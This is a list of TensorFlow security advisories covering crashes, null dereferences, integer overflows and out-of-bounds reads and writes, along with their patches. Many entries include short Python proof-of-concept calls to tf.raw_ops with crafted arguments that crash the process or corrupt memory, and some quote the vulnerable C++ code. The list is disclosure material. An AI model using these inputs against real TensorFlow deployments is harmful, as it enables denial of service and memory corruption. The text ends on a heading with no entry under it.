TensorFlow is an open source platform for machine learning. If FakeQuantWithMinMaxVars is given min or max tensors of a nonzero rank, it results in a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 785d67a78a1d533759fcd2f5e8d6ef778de849e0. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as …

Reachable Assertion

TensorFlow is an open source platform for machine learning. The implementation of FractionalAvgPoolGrad does not fully validate the input orig_input_tensor_shape. This results in an overflow that results in a CHECK failure which can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 03a659d7be9a1154fdf5eeac221e5950fec07dad. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, …

Out-of-bounds Write

TensorFlow is an open source platform for machine learning. The ScatterNd function takes an input argument that determines the indices of of the output tensor. An input index greater than the output tensor or less than zero will either write content at the wrong index or trigger a crash. We have patched the issue in GitHub commit b4d4b4cb019bd7240a52daa4ba61e3cc814f0384. The fix will be included in TensorFlow 2.10.0. We will also cherrypick …

Out-of-bounds Read

TensorFlow is an open source platform for machine learning. The GatherNd function takes arguments that determine the sizes of inputs and outputs. If the inputs given are greater than or equal to the sizes of the outputs, an out-of-bounds memory read is triggered. This issue has been patched in GitHub commit 595a65a3e224a0362d7e68c2213acfc2b499a196. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow …

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. When mlir::tfg::GraphDefImporter::ConvertNodeDef tries to convert NodeDefs without an op name, it crashes. We have patched the issue in GitHub commit a0f0b9a21c9270930457095092f558fbad4c03e5. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. When mlir::tfg::ConvertGenericFunctionToFunctionDef is given empty function attributes, it gives a null dereference. We have patched the issue in GitHub commit 1cf45b831eeb0cab8655c9c7c5d06ec6f45fc41b. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. When mlir::tfg::TFOp::nameAttr receives null type list attributes, it crashes. We have patched the issue in GitHub commits 3a754740d5414e362512ee981eefba41561a63a6 and a0f0b9a21c9270930457095092f558fbad4c03e5. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. If LowerBound or UpperBound is given an emptysorted_inputs input, it results in a nullptr dereference, leading to a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit bce3717eaef4f769019fd18e990464ca4a2efeea. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, …

Integer Overflow or Wraparound

TensorFlow is an open source platform for machine learning. When RangeSize receives values that do not fit into an int64_t, it crashes. We have patched the issue in GitHub commit 37e64539cd29fcfb814c4451152a60f5d107b0f0. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this …

Integer Overflow or Wraparound

TensorFlow is an open source platform for machine learning. The RaggedRangOp function takes an argument limits that is eventually used to construct a TensorShape as an int64. If limits is a very large float, it can overflow when converted to an int64. This triggers an InvalidArgument but also throws an abort signal that crashes the program. We have patched the issue in GitHub commit 37cefa91bee4eace55715eeef43720b958a01192. The fix will be included …

Improper Input Validation

TensorFlow is an open source platform for machine learning. If QuantizedBiasAdd is given min_input, max_input, min_bias, max_bias tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 785d67a78a1d533759fcd2f5e8d6ef778de849e0. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as …

Improper Input Validation

TensorFlow is an open source platform for machine learning. If QuantizedRelu or QuantizedRelu6 are given nonscalar inputs for min_features or max_features, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 49b3824d83af706df0ad07e4e677d88659756d89. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these …

Improper Input Validation

TensorFlow is an open source platform for machine learning. When converting transposed convolutions using per-channel weight quantization the converter segfaults and crashes the Python process. We have patched the issue in GitHub commit aa0b852a4588cea4d36b74feb05d93055540b450. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known …

Improper Input Validation

TensorFlow is an open source platform for machine learning. If Requantize is given input_min, input_max, requested_output_min, requested_output_max tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 785d67a78a1d533759fcd2f5e8d6ef778de849e0. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as …

Improper Input Validation

TensorFlow is an open source platform for machine learning. If QuantizedAdd is given min_input or max_input tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 49b3824d83af706df0ad07e4e677d88659756d89. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these …

Improper Input Validation

TensorFlow is an open source platform for machine learning. If SparseBincount is given inputs for indices, values, and dense_shape that do not make a valid sparse tensor, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 40adbe4dd15b582b0210dfbf40c243a62f5119fa. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow …

Improper Input Validation

TensorFlow is an open source platform for machine learning. If QuantizeDownAndShrinkRange is given nonscalar inputs for input_min or input_max, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 73ad1815ebcfeb7c051f9c2f7ab5024380ca8613. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also …

Improper Input Validation

TensorFlow is an open source platform for machine learning. If QuantizedAvgPool is given min_input or max_input tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 7cdf9d4d2083b739ec81cfdace546b0c99f50622. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these …

Improper Input Validation

TensorFlow is an open source platform for machine learning. If QuantizedMatMul is given nonscalar input for: min_a, max_a, min_b, or max_b It gives a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit aca766ac7693bf29ed0df55ad6bfcc78f35e7f48. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are …

Improper Input Validation

TensorFlow is an open source platform for machine learning. If QuantizedInstanceNorm is given x_min or x_max tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 785d67a78a1d533759fcd2f5e8d6ef778de849e0. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these …

Improper Input Validation

TensorFlow is an open source platform for machine learning. The implementation of BlockLSTMGradV2 does not fully validate its inputs. This results in a a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 2a458fc4866505be27c62f81474ecb2b870498fa. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are …

Divide By Zero

TensorFlow is an open source platform for machine learning. If Conv2D is given empty input and the filter and padding sizes are valid, the output is all-zeros. This causes division-by-zero floating point exceptions that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 611d80db29dd7b0cfb755772c69d60ae5bca05f9. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, …

Use of Uninitialized Resource

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, there is a potential for segfault / denial of service in TensorFlow by calling tf.compat.v1.* ops which don't yet have support for quantized types, which was added after migration to TensorFlow 2.x. In these scenarios, since the kernel is missing, a nullptr value is passed to ParseDimensionValue for the py_value argument. Then, this …

Undefined Behavior for Input to API

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, multiple TensorFlow operations misbehave in eager mode when the resource handle provided to them is invalid. In graph mode, it would have been impossible to perform these API calls, but migration to TF 2.x eager mode opened up this vulnerability. If the resource handle is empty, then a reference is bound to a …

Uncontrolled Resource Consumption

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.ragged.constant does not fully validate the input arguments. This results in a denial of service by consuming all available memory. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

Out-of-bounds Write

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.EditDistance has incomplete validation. Users can pass negative values to cause a segmentation fault based denial of service. In multiple places throughout the code, one may compute an index for a write operation. However, the existing validation only checks against the upper bound of the array. Hence, it is possible …

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.SparseTensorDenseAdd does not fully validate the input arguments. In this case, a reference gets bound to a nullptr during kernel execution. This is undefined behavior. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.QuantizedConv2D does not fully validate the input arguments. In this case, references get bound to nullptr for each argument that is empty. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

Missing validation causes denial of service via `UnsortedSegmentJoin`

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.UnsortedSegmentJoin does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. The code assumes num_segments is a scalar but there is no validation for this before accessing its value. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a …

Missing validation causes denial of service via `Conv3DBackpropFilterV2`

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.UnsortedSegmentJoin does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. The code assumes num_segments is a positive scalar but there is no validation. Since this value is used to allocate the output tensor, a negative value …

Integer Overflow or Wraparound

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.SpaceToBatchND (in all backends such as XLA and handwritten kernels) is vulnerable to an integer overflow: The result of this integer overflow is used to allocate the output tensor, hence we get a denial of service via a CHECK-failure (assertion failure), as in TFSA-2021-198. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 …

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.histogram_fixed_width is vulnerable to a crash when the values array contain Not a Number (NaN) elements. The implementation assumes that all floating point operations are defined and then converts a floating point result to an integer index. If values contains NaN then the result of the division is still NaN …

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.Conv3DBackpropFilterV2 does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. The code does not validate that the filter_sizes argument is a vector. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.LoadAndRemapMatrix does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. The code assumes initializing_values` is a vector but there is no validation for this before accessing its value. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a …

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.GetSessionTensor does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.LSTMBlockCell does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. The code does not validate the ranks of any of the arguments to this API call. This results in CHECK-failures when the elements of the tensor …

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, certain TFLite models that were created using TFLite model converter would crash when loaded in the TFLite interpreter. The culprit is that during quantization the scale of values could be greater than 1 but code was always assuming sub-unit scaling. Thus, since code was calling QuantizeMultiplierSmallerThanOneExp, the TFLITE_CHECK_LT assertion would trigger and abort …

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.SparseTensorToCSRSparseMatrix does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. The code assumes dense_shape is a vector and indices is a matrix (as part of requirements for sparse tensors) but there is no validation for this. …

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the tf.compat.v1.signal.rfft2d and tf.compat.v1.signal.rfft3d lack input validation and under certain condition can result in crashes (due to CHECK-failures). Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.StagePeek does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. The code assumes index is a scalar but there is no validation for this before accessing its value. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a …

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.QuantizeAndDequantizeV4Grad does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.TensorSummaryV2 does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.DeleteSessionTensor does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

Improper Control of Generation of Code ('Code Injection')

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, TensorFlow's saved_model_cli tool is vulnerable to a code injection. This can be used to open a reverse shell. This code path was maintained for compatibility reasons as the maintainers had several test cases where numpy expressions were used as arguments. However, given that the tool is always run manually, the impact of this …

Heap-based Buffer Overflow

TensorFlow is an open source platform for machine learning. In version 2.8.0, the TensorKey hash function used total estimated AllocatedBytes(), which (a) is an estimate per tensor, and (b) is a very poor hash function for constants (e.g. int32_t). It also tried to access individual tensor bytes through tensor.data() of size AllocatedBytes(). This led to ASAN failures because the AllocatedBytes() is an estimate of total bytes allocated by a tensor, …

Access of Resource Using Incompatible Type ('Type Confusion')

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the macros that TensorFlow uses for writing assertions (e.g., CHECK_LT, CHECK_GT, etc.) have an incorrect logic when comparing size_t and int values. Due to type conversion rules, several of the macros would trigger incorrectly. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

Incomplete validation in `SparseSparseMinimum`

Incomplete validation in SparseAdd results in allowing attackers to exploit undefined behavior (dereferencing null pointers) as well as write outside of bounds of heap allocated data: import tensorflow as tf a_indices = tf.ones([45, 92], dtype=tf.int64) a_values = tf.ones([45], dtype=tf.int64) a_shape = tf.ones([1], dtype=tf.int64) b_indices = tf.ones([1, 1], dtype=tf.int64) b_values = tf.ones([1], dtype=tf.int64) b_shape = tf.ones([1], dtype=tf.int64) tf.raw_ops.SparseSparseMinimum(a_indices=a_indices, a_values=a_values, a_shape=a_shape, b_indices=b_indices, b_values=b_values, b_shape=b_shape)

Type confusion leading to segfault in Tensorflow

The implementation of shape inference for ConcatV2 can be used to trigger a denial of service attack via a segfault caused by a type confusion: import tensorflow as tf @tf.function def test(): y = tf.raw_ops.ConcatV2( values=[[1,2,3],[4,5,6]], axis = 0xb500005b) return y test() The axis argument is translated into concat_dim in the ConcatShapeHelper helper function. Then, a value for min_rank is computed based on concat_dim. This is then used to validate …

Null-dereference in Tensorflow

The implementation of GetInitOp is vulnerable to a crash caused by dereferencing a null pointer: const auto& init_op_sig_it = meta_graph_def.signature_def().find(kSavedModelInitOpSignatureKey); if (init_op_sig_it != sig_def_map.end()) { *init_op_name = init_op_sig_it->second.outputs() .find(kSavedModelInitOpSignatureKey) ->second.name(); return Status::OK(); } Here, we have a nested map and we assume that if the first .find succeeds then so would be the search in the internal map. However, the maps are built based on the SavedModel protobuf format and …

Memory leak in Tensorflow

If a graph node is invalid, TensorFlow can leak memory in the implementation of ImmutableExecutorState::Initialize: Status s = params_.create_kernel(n->properties(), &item->kernel); if (!s.ok()) { item->kernel = nullptr; s = AttachDef(s, n); return s; } Here, we set item->kernel to nullptr but it is a simple OpKernel pointer so the memory that was previously allocated to it would leak.

Memory exhaustion in Tensorflow

The implementation of StringNGrams can be used to trigger a denial of service attack by causing an OOM condition after an integer overflow: import tensorflow as tf tf.raw_ops.StringNGrams( data=['123456'], data_splits=[0,1], separator='a'*15, ngram_widths=[], left_pad='', right_pad='', pad_width=-5, preserve_short_sequences=True) We are missing a validation on pad_witdh and that result in computing a negative value for ngram_width which is later used to allocate parts of the output.

Memory exhaustion in Tensorflow

The implementation of ThreadPoolHandle can be used to trigger a denial of service attack by allocating too much memory: import tensorflow as tf y = tf.raw_ops.ThreadPoolHandle(num_threads=0x60000000,display_name='tf') This is because the num_threads argument is only checked to not be negative, but there is no upper bound on its value.

Integer overflow in Tensorflow

The implementation of OpLevelCostEstimator::CalculateOutputSize is vulnerable to an integer overflow if an attacker can create an operation which would involve tensors with large enough number of elements: for (const auto& dim : output_shape.dim()) { output_size *= dim.size(); } Here, we can have a large enough number of dimensions in output_shape.dim() or just a small number of dimensions being large enough to cause an overflow in the multiplication.

Integer overflow in Tensorflow

The implementation of OpLevelCostEstimator::CalculateTensorSize is vulnerable to an integer overflow if an attacker can create an operation which would involve a tensor with large enough number of elements: int64_t OpLevelCostEstimator::CalculateTensorSize( const OpInfo::TensorProperties& tensor, bool* found_unknown_shapes) { int64_t count = CalculateTensorElementCount(tensor, found_unknown_shapes); int size = DataTypeSize(BaseType(tensor.dtype())); VLOG(2) << "Count: " << count << " DataTypeSize: " << size; return count * size; } Here, count and size can be large enough …

Division by zero in Tensorflow

The implementation of FractionalMaxPool can be made to crash a TensorFlow process via a division by 0: import tensorflow as tf import numpy as np tf.raw_ops.FractionalMaxPool( value=tf.constant(value=[[[[1, 4, 2, 3]]]], dtype=tf.int64), pooling_ratio=[1.0, 1.44, 1.73, 1.0], pseudo_random=False, overlapping=False, deterministic=False, seed=0, seed2=0, name=None)

Division by zero in Tensorflow

The estimator for the cost of some convolution operations can be made to execute a division by 0: import tensorflow as tf @tf.function def test(): y=tf.raw_ops.AvgPoolGrad( orig_input_shape=[1,1,1,1], grad=[[[[1.0],[1.0],[1.0]]],[[[2.0],[2.0],[2.0]]],[[[3.0],[3.0],[3.0]]]], ksize=[1,1,1,1], strides=[1,1,1,0], padding='VALID', data_format='NCHW') return y test() The function fails to check that the stride argument is stricly positive: int64_t GetOutputSize(const int64_t input, const int64_t filter, const int64_t stride, const Padding& padding) { // Logic for calculating output shape is from GetWindowedOutputSizeVerbose() …

`CHECK`-failures in Tensorflow

The implementation of MapStage is vulnerable a CHECK-fail if the key tensor is not a scalar: import tensorflow as tf import numpy as np tf.raw_ops.MapStage( key = tf.constant(value=[4], shape= (1,2), dtype=tf.int64), indices = np.array([[6]]), values = np.array([-60]), dtypes = [tf.int64], capacity=0, memory_limit=0, container='', shared_name='', name=None )

`CHECK`-failures in binary ops in Tensorflow

A malicious user can cause a denial of service by altering a SavedModel such that any binary op would trigger CHECK failures. This occurs when the protobuf part corresponding to the tensor arguments is modified such that the dtype no longer matches the dtype expected by the op. In that case, calling the templated binary operator for the binary op would receive corrupted data, due to the type confusion involved: …

`CHECK`-failures in `TensorByteSize` in Tensorflow

A malicious user can cause a denial of service by altering a SavedModel such that TensorByteSize would trigger CHECK failures. int64_t TensorByteSize(const TensorProto& t) { // num_elements returns -1 if shape is not fully defined. int64_t num_elems = TensorShape(t.tensor_shape()).num_elements(); return num_elems < 0 ? -1 : num_elems * DataTypeSize(t.dtype()); } TensorShape constructor throws a CHECK-fail if shape is partial or has a number of elements that would overflow the size …

Use after free in `DecodePng` kernel

A malicious user can cause a use after free behavior when decoding PNG images: if (/* … error conditions … */) { png::CommonFreeDecode(&decode); OP_REQUIRES(context, false, errors::InvalidArgument("PNG size too large for int: ", decode.width, " by ", decode.height)); } After png::CommonFreeDecode(&decode) gets called, the values of decode.width and decode.height are in an unspecified state.

Uninitialized variable access in Tensorflow

The implementation of AssignOp can result in copying unitialized data to a new tensor. This later results in undefined behavior. The implementation has a check that the left hand side of the assignment is initialized (to minimize number of allocations), but does not check that the right hand side is also initialized.

Undefined behavior in `SparseTensorSliceDataset`

The implementation of SparseTensorSliceDataset has an undefined behavior: under certain condition it can be made to dereference a nullptr value: import tensorflow as tf import numpy as np tf.raw_ops.SparseTensorSliceDataset( indices=[[]], values=[], dense_shape=[1,1]) The 3 input arguments represent a sparse tensor. However, there are some preconditions that these arguments must satisfy but these are not validated in the implementation.

Stack overflow in TensorFlow

The GraphDef format in TensorFlow does not allow self recursive functions. The runtime assumes that this invariant is satisfied. However, a GraphDef containing a fragment such as the following can be consumed when loading a SavedModel: library { function { signature { name: "SomeOp" description: "Self recursive op" } node_def { name: "1" op: "SomeOp" } node_def { name: "2" op: "SomeOp" } } } This would result in a …

Segfault in `simplifyBroadcast` in Tensorflow

The simplifyBroadcast function in the MLIR-TFRT infrastructure in TensorFlow is vulnerable to a segfault (hence, denial of service), if called with scalar shapes. size_t maxRank = 0; for (auto shape : llvm::enumerate(shapes)) { auto found_shape = analysis.dimensionsForShapeTensor(shape.value()); if (!found_shape) return {}; shapes_found.push_back(found_shape); maxRank = std::max(maxRank, found_shape->size()); } SmallVector<const ShapeComponentAnalysis::SymbolicDimension> joined_dimensions(maxRank); If all shapes are scalar, then maxRank is 0, so we build an empty SmallVector.

Reachable Assertion in Tensorflow

When decoding a tensor from protobuf, a TensorFlow process can encounter cases where a CHECK assertion is invalidated based on user controlled arguments, if the tensors have an invalid dtype and 0 elements or an invalid shape. This allows attackers to cause denial of services in TensorFlow processes.

Reachable Assertion in Tensorflow

When decoding a resource handle tensor from protobuf, a TensorFlow process can encounter cases where a CHECK assertion is invalidated based on user controlled arguments. This allows attackers to cause denial of services in TensorFlow processes.

Out-of-bounds Write

Tensorflow is an Open Source Machine Learning Framework. The TFG dialect of TensorFlow makes several assumptions about the incoming GraphDef before converting it to the MLIR-based dialect. If an attacker changes the SavedModel format on disk to invalidate these assumptions and the GraphDef is then converted to MLIR-based IR then they can cause a crash in the Python interpreter. Under certain scenarios, heap OOB read/writes are possible. These issues have …

Out of bounds write in TFLite

An attacker can craft a TFLite model that would cause a write outside of bounds of an array in TFLite. In fact, the attacker can override the linked list used by the memory allocator. This can be leveraged for an arbitrary write primitive under certain conditions.

Out of bounds write in Tensorflow

TensorFlow is vulnerable to a heap OOB write in Grappler: Status SetUnknownShape(const NodeDef* node, int output_port) { shape_inference::ShapeHandle shape = GetUnknownOutputShape(node, output_port); InferenceContext* ctx = GetContext(node); if (ctx == nullptr) { return errors::InvalidArgument("Missing context"); } ctx->set_output(output_port, shape); return Status::OK(); } The set_output function writes to an array at the specified index: void set_output(int idx, ShapeHandle shape) { outputs_.at(idx) = shape; } Hence, this gives a malicious user a write primitive.

Out of bounds read in Tensorflow

The implementation of FractionalAvgPoolGrad does not consider cases where the input tensors are invalid allowing an attacker to read from outside of bounds of heap: import tensorflow as tf @tf.function def test(): y = tf.raw_ops.FractionalAvgPoolGrad( orig_input_tensor_shape=[2,2,2,2], out_backprop=[[[[1,2], [3, 4], [5, 6]], [[7, 8], [9,10], [11,12]]]], row_pooling_sequence=[-10,1,2,3], col_pooling_sequence=[1,2,3,4], overlapping=True) return y test()

Out of bounds read in Tensorflow

The implementation of Dequantize does not fully validate the value of axis and can result in heap OOB accesses: import tensorflow as tf @tf.function def test(): y = tf.raw_ops.Dequantize( input=tf.constant([1,1],dtype=tf.qint32), min_range=[1.0], max_range=[10.0], mode='MIN_COMBINED', narrow_range=False, axis=2**31-1, dtype=tf.bfloat16) return y test() The axis argument can be -1 (the default value for the optional argument) or any other positive value at most the number of dimensions of the input. Unfortunately, the upper bound …

Out of bounds read in Tensorflow

TensorFlow's type inference can cause a heap OOB read as the bounds checking is done in a DCHECK (which is a no-op during production): if (node_t.type_id() != TFT_UNSET) { int ix = input_idx[i]; DCHECK(ix < node_t.args_size()) << "input " << i << " should have an output " << ix << " but instead only has " << node_t.args_size() << " outputs: " << node_t.DebugString(); input_types.emplace_back(node_t.args(ix)); // … } An …

Out of bounds read in Tensorflow

The implementation of shape inference for ReverseSequence does not fully validate the value of batch_dim and can result in a heap OOB read: import tensorflow as tf @tf.function def test(): y = tf.raw_ops.ReverseSequence( input = ['aaa','bbb'], seq_lengths = [1,1,1], seq_dim = -10, batch_dim = -10 ) return y test() There is a check to make sure the value of batch_dim does not go over the rank of the input, but …

Out of bounds read and write in Tensorflow

There is a typo in TensorFlow's SpecializeType which results in heap OOB read/write: for (int i = 0; i < op_def.output_arg_size(); i++) { // … for (int j = 0; j < t->args_size(); j++) { auto* arg = t->mutable_args(i); // … } } Due to a typo, arg is initialized to the ith mutable argument in a loop where the loop index is j. Hence it is possible to assign …

Null-dereference in Tensorflow

When decoding a tensor from protobuf, TensorFlow might do a null-dereference if attributes of some mutable arguments to some operations are missing from the proto. This is guarded by a DCHECK: const auto* attr = attrs.Find(arg->s()); DCHECK(attr != nullptr); if (attr->value_case() == AttrValue::kList) { // … } However, DCHECK is a no-op in production builds and an assertion failure in debug builds. In the first case execution proceeds to the …

Null pointer dereference in TensorFlow

When building an XLA compilation cache, if default settings are used, TensorFlow triggers a null pointer dereference: string allowed_gpus = flr->config_proto()->gpu_options().visible_device_list(); In the default scenario, all devices are allowed, so flr->config_proto is nullptr.

Null pointer dereference in TensorFlow

The implementation of QuantizedMaxPool has an undefined behavior where user controlled inputs can trigger a reference binding to null pointer. import tensorflow as tf tf.raw_ops.QuantizedMaxPool( input = tf.constant([[[[4]]]], dtype=tf.quint8), min_input = [], max_input = [1], ksize = [1, 1, 1, 1], strides = [1, 1, 1, 1], padding = "SAME", name=None )

NULL Pointer Dereference and Access of Uninitialized Pointer in TensorFlow

Impact The code for boosted trees in TensorFlow is still missing validation. This allows malicious users to read and write outside of bounds of heap allocated data as well as trigger denial of service (via dereferencing nullptrs or via CHECK-failures). This follows after CVE-2021-41208 where these APIs were still vulnerable to multiple security issues. Note: Given that the boosted trees implementation in TensorFlow is unmaintained, it is recommend to no …

Memory leak in decoding PNG images

When decoding PNG images TensorFlow can produce a memory leak if the image is invalid. After calling png::CommonInitDecode(…, &decode), the decode value contains allocated buffers which can only be freed by calling png::CommonFreeDecode(&decode). However, several error case in the function implementation invoke the OP_REQUIRES macro which immediately terminates the execution of the function, without allowing for the memory free to occur.

Integer overflows in Tensorflow

